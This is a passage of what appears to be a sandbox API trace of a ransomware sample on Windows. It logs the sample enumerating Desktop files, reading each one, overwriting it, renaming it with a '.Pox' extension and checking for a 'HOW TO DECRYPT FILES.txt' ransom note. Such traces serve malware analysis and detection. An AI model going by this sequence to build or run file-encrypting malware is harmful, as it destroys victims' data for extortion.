ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0035.065] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6a67250, ftCreationTime.dwHighDateTime=0x1d4cbcb, ftLastAccessTime.dwLowDateTime=0x3e8d5750, ftLastAccessTime.dwHighDateTime=0x1d4d54f, ftLastWriteTime.dwLowDateTime=0x3e8d5750, ftLastWriteTime.dwHighDateTime=0x1d4d54f, nFileSizeHigh=0x0, nFileSizeLow=0x3da7, dwReserved0=0x0, dwReserved1=0x0, cFileName="dRLDjJ.swf", cAlternateFileName="")) returned 1 [0035.066] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c999730, ftCreationTime.dwHighDateTime=0x1d4ceb8, ftLastAccessTime.dwLowDateTime=0xd07de150, ftLastAccessTime.dwHighDateTime=0x1d4ceda, ftLastWriteTime.dwLowDateTime=0xd07de150, ftLastWriteTime.dwHighDateTime=0x1d4ceda, nFileSizeHigh=0x0, nFileSizeLow=0x134a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="ENBmMMWK.bmp", cAlternateFileName="")) returned 1 [0035.066] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4ddbec0, ftCreationTime.dwHighDateTime=0x1d4cc51, ftLastAccessTime.dwLowDateTime=0xf54fa3d0, ftLastAccessTime.dwHighDateTime=0x1d4d33d, ftLastWriteTime.dwLowDateTime=0xf54fa3d0, ftLastWriteTime.dwHighDateTime=0x1d4d33d, nFileSizeHigh=0x0, nFileSizeLow=0x10751, dwReserved0=0x0, dwReserved1=0x0, cFileName="gH-zamZAJg.mp3", cAlternateFileName="GH-ZAM~1.MP3")) returned 1 [0035.066] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0ee2d40, ftCreationTime.dwHighDateTime=0x1d4d1d7, ftLastAccessTime.dwLowDateTime=0xe528e990, ftLastAccessTime.dwHighDateTime=0x1d4d4e5, ftLastWriteTime.dwLowDateTime=0xe528e990, ftLastWriteTime.dwHighDateTime=0x1d4d4e5, nFileSizeHigh=0x0, nFileSizeLow=0x151ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="ICKBPik8.flv", cAlternateFileName="")) returned 1 [0035.066] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1ebac40, ftCreationTime.dwHighDateTime=0x1d4c9fe, ftLastAccessTime.dwLowDateTime=0x989a0550, ftLastAccessTime.dwHighDateTime=0x1d4cb2b, ftLastWriteTime.dwLowDateTime=0x989a0550, ftLastWriteTime.dwHighDateTime=0x1d4cb2b, nFileSizeHigh=0x0, nFileSizeLow=0x16850, dwReserved0=0x0, dwReserved1=0x0, cFileName="m4SvX-jeGXwW.mkv", cAlternateFileName="M4SVX-~1.MKV")) returned 1 [0035.066] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcddf5a90, ftCreationTime.dwHighDateTime=0x1d4ce8b, ftLastAccessTime.dwLowDateTime=0x5c6f7bf0, ftLastAccessTime.dwHighDateTime=0x1d4d3d2, ftLastWriteTime.dwLowDateTime=0x5c6f7bf0, ftLastWriteTime.dwHighDateTime=0x1d4d3d2, nFileSizeHigh=0x0, nFileSizeLow=0x6d32, dwReserved0=0x0, dwReserved1=0x0, cFileName="O0y0hsLAoKxoA.mp3", cAlternateFileName="O0Y0HS~1.MP3")) returned 1 [0035.067] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a8281a0, ftCreationTime.dwHighDateTime=0x1d4d373, ftLastAccessTime.dwLowDateTime=0x95a18ea0, ftLastAccessTime.dwHighDateTime=0x1d4cd14, ftLastWriteTime.dwLowDateTime=0x95a18ea0, ftLastWriteTime.dwHighDateTime=0x1d4cd14, nFileSizeHigh=0x0, nFileSizeLow=0x16fab, dwReserved0=0x0, dwReserved1=0x0, cFileName="RQ9 -66bCRPg.odp", cAlternateFileName="RQ9-66~1.ODP")) returned 1 [0035.067] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd24e9870, ftCreationTime.dwHighDateTime=0x1d4d2a5, ftLastAccessTime.dwLowDateTime=0x1bf10c20, ftLastAccessTime.dwHighDateTime=0x1d4d502, ftLastWriteTime.dwLowDateTime=0x1bf10c20, ftLastWriteTime.dwHighDateTime=0x1d4d502, nFileSizeHigh=0x0, nFileSizeLow=0x5c9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="sN3K33tDMKQaoIqJe.mp4", cAlternateFileName="SN3K33~1.MP4")) returned 1 [0035.067] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x887d2840, ftCreationTime.dwHighDateTime=0x1d4d5a9, ftLastAccessTime.dwLowDateTime=0x24ca6ae0, ftLastAccessTime.dwHighDateTime=0x1d4c9c6, ftLastWriteTime.dwLowDateTime=0x24ca6ae0, ftLastWriteTime.dwHighDateTime=0x1d4c9c6, nFileSizeHigh=0x0, nFileSizeLow=0x87fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="sxImIod6M.m4a", cAlternateFileName="SXIMIO~1.M4A")) returned 1 [0035.067] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36868070, ftCreationTime.dwHighDateTime=0x1d4d47a, ftLastAccessTime.dwLowDateTime=0x82604d80, ftLastAccessTime.dwHighDateTime=0x1d4ca54, ftLastWriteTime.dwLowDateTime=0x82604d80, ftLastWriteTime.dwHighDateTime=0x1d4ca54, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="T9ZgHii-", cAlternateFileName="")) returned 1 [0035.067] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55265fc0, ftCreationTime.dwHighDateTime=0x1d4c618, ftLastAccessTime.dwLowDateTime=0x613dbfe0, ftLastAccessTime.dwHighDateTime=0x1d4ca9d, ftLastWriteTime.dwLowDateTime=0x613dbfe0, ftLastWriteTime.dwHighDateTime=0x1d4ca9d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tQYzvy44", cAlternateFileName="")) returned 1 [0035.068] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaa03290, ftCreationTime.dwHighDateTime=0x1d4d118, ftLastAccessTime.dwLowDateTime=0x3abf6060, ftLastAccessTime.dwHighDateTime=0x1d4c69e, ftLastWriteTime.dwLowDateTime=0x3abf6060, ftLastWriteTime.dwHighDateTime=0x1d4c69e, nFileSizeHigh=0x0, nFileSizeLow=0x139da, dwReserved0=0x0, dwReserved1=0x0, cFileName="wcRE.jpg", cAlternateFileName="")) returned 1 [0035.068] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d01ce90, ftCreationTime.dwHighDateTime=0x1d4d54b, ftLastAccessTime.dwLowDateTime=0x7107d870, ftLastAccessTime.dwHighDateTime=0x1d4d23b, ftLastWriteTime.dwLowDateTime=0x7107d870, ftLastWriteTime.dwHighDateTime=0x1d4d23b, nFileSizeHigh=0x0, nFileSizeLow=0xb618, dwReserved0=0x0, dwReserved1=0x0, cFileName="XRPTN7Kw.png", cAlternateFileName="")) returned 1 [0035.068] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2d476b0, ftCreationTime.dwHighDateTime=0x1d4cc77, ftLastAccessTime.dwLowDateTime=0x17a50f70, ftLastAccessTime.dwHighDateTime=0x1d4c7ad, ftLastWriteTime.dwLowDateTime=0x17a50f70, ftLastWriteTime.dwHighDateTime=0x1d4c7ad, nFileSizeHigh=0x0, nFileSizeLow=0xaf75, dwReserved0=0x0, dwReserved1=0x0, cFileName="yjbKOP66PA6 t9xa78.bmp", cAlternateFileName="YJBKOP~1.BMP")) returned 1 [0035.068] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d050ed0, ftCreationTime.dwHighDateTime=0x1d4c956, ftLastAccessTime.dwLowDateTime=0x88d79d70, ftLastAccessTime.dwHighDateTime=0x1d4cd1b, ftLastWriteTime.dwLowDateTime=0x88d79d70, ftLastWriteTime.dwHighDateTime=0x1d4cd1b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Zh5KHKzPc6AOkC3JGPhN", cAlternateFileName="ZH5KHK~1")) returned 1 [0035.068] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fa5d7a0, ftCreationTime.dwHighDateTime=0x1d4cabf, ftLastAccessTime.dwLowDateTime=0xe356290, ftLastAccessTime.dwHighDateTime=0x1d4c650, ftLastWriteTime.dwLowDateTime=0xe356290, ftLastWriteTime.dwHighDateTime=0x1d4c650, nFileSizeHigh=0x0, nFileSizeLow=0x44af, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZR4FkDMgSj24KiPo8.odt", cAlternateFileName="ZR4FKD~1.ODT")) returned 1 [0035.068] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e75a920, ftCreationTime.dwHighDateTime=0x1d4cf39, ftLastAccessTime.dwLowDateTime=0x99ddca50, ftLastAccessTime.dwHighDateTime=0x1d4ce28, ftLastWriteTime.dwLowDateTime=0x99ddca50, ftLastWriteTime.dwHighDateTime=0x1d4ce28, nFileSizeHigh=0x0, nFileSizeLow=0x134df, dwReserved0=0x0, dwReserved1=0x0, cFileName="Zu7U9XrkG49K.wav", cAlternateFileName="ZU7U9X~1.WAV")) returned 1 [0035.069] FindNextFileW (in: hFindFile=0x405d48, lpFindFileData=0x3ae350 | out: lpFindFileData=0x3ae350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e75a920, ftCreationTime.dwHighDateTime=0x1d4cf39, ftLastAccessTime.dwLowDateTime=0x99ddca50, ftLastAccessTime.dwHighDateTime=0x1d4ce28, ftLastWriteTime.dwLowDateTime=0x99ddca50, ftLastWriteTime.dwHighDateTime=0x1d4ce28, nFileSizeHigh=0x0, nFileSizeLow=0x134df, dwReserved0=0x0, dwReserved1=0x0, cFileName="Zu7U9XrkG49K.wav", cAlternateFileName="ZU7U9X~1.WAV")) returned 0 [0035.069] FindClose (in: hFindFile=0x405d48 | out: hFindFile=0x405d48) returned 1 [0035.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0035.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0035.080] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1FQ_9d0LXe6pMvO2.rtf", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1FQ_9d0LXe6pMvO2.rtf", lpFilePart=0x0) returned 0x3a [0035.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0035.080] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1FQ_9d0LXe6pMvO2.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1fq_9d0lxe6pmvo2.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x230 [0035.080] GetFileType (hFile=0x230) returned 0x1 [0035.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0035.081] GetFileType (hFile=0x230) returned 0x1 [0035.081] GetFileSize (in: hFile=0x230, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x11b9c [0035.082] ReadFile (in: hFile=0x230, lpBuffer=0x23db434, nNumberOfBytesToRead=0x11b9c, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x23db434*, lpNumberOfBytesRead=0x3ae570*=0x11b9c, lpOverlapped=0x0) returned 1 [0035.083] CloseHandle (hObject=0x230) returned 1 [0036.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x3adf7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0036.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x3adfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0036.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae440) returned 1 [0036.780] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x3ae4bc | out: lpFileInformation=0x3ae4bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0036.780] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae43c) returned 1 [0036.898] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x3ae1cc | out: pfEnabled=0x3ae1cc) returned 0x0 [0037.254] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0037.254] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0037.254] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0037.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0037.254] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1FQ_9d0LXe6pMvO2.rtf", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1FQ_9d0LXe6pMvO2.rtf", lpFilePart=0x0) returned 0x3a [0037.254] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0037.254] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1FQ_9d0LXe6pMvO2.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1fq_9d0lxe6pmvo2.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.259] GetFileType (hFile=0x26c) returned 0x1 [0037.259] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0037.259] GetFileType (hFile=0x26c) returned 0x1 [0037.259] WriteFile (in: hFile=0x26c, lpBuffer=0x2487814*, nNumberOfBytesToWrite=0x11ba0, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x2487814*, lpNumberOfBytesWritten=0x3ae564*=0x11ba0, lpOverlapped=0x0) returned 1 [0037.261] CloseHandle (hObject=0x26c) returned 1 [0037.264] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1FQ_9d0LXe6pMvO2.rtf", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1FQ_9d0LXe6pMvO2.rtf", lpFilePart=0x0) returned 0x3a [0037.264] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1FQ_9d0LXe6pMvO2.rtf.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1FQ_9d0LXe6pMvO2.rtf.Pox", lpFilePart=0x0) returned 0x3e [0037.264] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0037.264] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1FQ_9d0LXe6pMvO2.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1fq_9d0lxe6pmvo2.rtf"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f58a80, ftCreationTime.dwHighDateTime=0x1d4d216, ftLastAccessTime.dwLowDateTime=0x9eba96d0, ftLastAccessTime.dwHighDateTime=0x1d4d552, ftLastWriteTime.dwLowDateTime=0x286504c0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x11ba0)) returned 1 [0037.264] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0037.264] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1FQ_9d0LXe6pMvO2.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1fq_9d0lxe6pmvo2.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1FQ_9d0LXe6pMvO2.rtf.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1fq_9d0lxe6pmvo2.rtf.pox")) returned 1 [0037.266] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Xy0mJv5xwhx4K1K.mkv", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Xy0mJv5xwhx4K1K.mkv", lpFilePart=0x0) returned 0x3a [0037.266] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0037.266] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Xy0mJv5xwhx4K1K.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2xy0mjv5xwhx4k1k.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.266] GetFileType (hFile=0x26c) returned 0x1 [0037.266] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0037.266] GetFileType (hFile=0x26c) returned 0x1 [0037.266] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0xec72 [0037.267] ReadFile (in: hFile=0x26c, lpBuffer=0x2499970, nNumberOfBytesToRead=0xec72, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x2499970*, lpNumberOfBytesRead=0x3ae570*=0xec72, lpOverlapped=0x0) returned 1 [0037.268] CloseHandle (hObject=0x26c) returned 1 [0037.292] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0037.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0037.292] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0037.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0037.292] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Xy0mJv5xwhx4K1K.mkv", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Xy0mJv5xwhx4K1K.mkv", lpFilePart=0x0) returned 0x3a [0037.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0037.292] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Xy0mJv5xwhx4K1K.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2xy0mjv5xwhx4k1k.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.314] GetFileType (hFile=0x26c) returned 0x1 [0037.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0037.314] GetFileType (hFile=0x26c) returned 0x1 [0037.314] WriteFile (in: hFile=0x26c, lpBuffer=0x2512cf0*, nNumberOfBytesToWrite=0xec80, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x2512cf0*, lpNumberOfBytesWritten=0x3ae564*=0xec80, lpOverlapped=0x0) returned 1 [0037.316] CloseHandle (hObject=0x26c) returned 1 [0037.317] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Xy0mJv5xwhx4K1K.mkv", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Xy0mJv5xwhx4K1K.mkv", lpFilePart=0x0) returned 0x3a [0037.317] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Xy0mJv5xwhx4K1K.mkv.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Xy0mJv5xwhx4K1K.mkv.Pox", lpFilePart=0x0) returned 0x3e [0037.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0037.317] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Xy0mJv5xwhx4K1K.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2xy0mjv5xwhx4k1k.mkv"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf5379f0, ftCreationTime.dwHighDateTime=0x1d4cfbd, ftLastAccessTime.dwLowDateTime=0x3003e2c0, ftLastAccessTime.dwHighDateTime=0x1d4ce7a, ftLastWriteTime.dwLowDateTime=0x286c28e0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xec80)) returned 1 [0037.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0037.317] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Xy0mJv5xwhx4K1K.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2xy0mjv5xwhx4k1k.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2Xy0mJv5xwhx4K1K.mkv.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2xy0mjv5xwhx4k1k.mkv.pox")) returned 1 [0037.319] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6oF3FL3YfrkND.bmp", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6oF3FL3YfrkND.bmp", lpFilePart=0x0) returned 0x37 [0037.319] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0037.319] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6oF3FL3YfrkND.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6of3fl3yfrknd.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.319] GetFileType (hFile=0x26c) returned 0x1 [0037.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0037.319] GetFileType (hFile=0x26c) returned 0x1 [0037.319] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x97a3 [0037.320] ReadFile (in: hFile=0x26c, lpBuffer=0x2521f04, nNumberOfBytesToRead=0x97a3, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x2521f04*, lpNumberOfBytesRead=0x3ae570*=0x97a3, lpOverlapped=0x0) returned 1 [0037.321] CloseHandle (hObject=0x26c) returned 1 [0037.469] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT 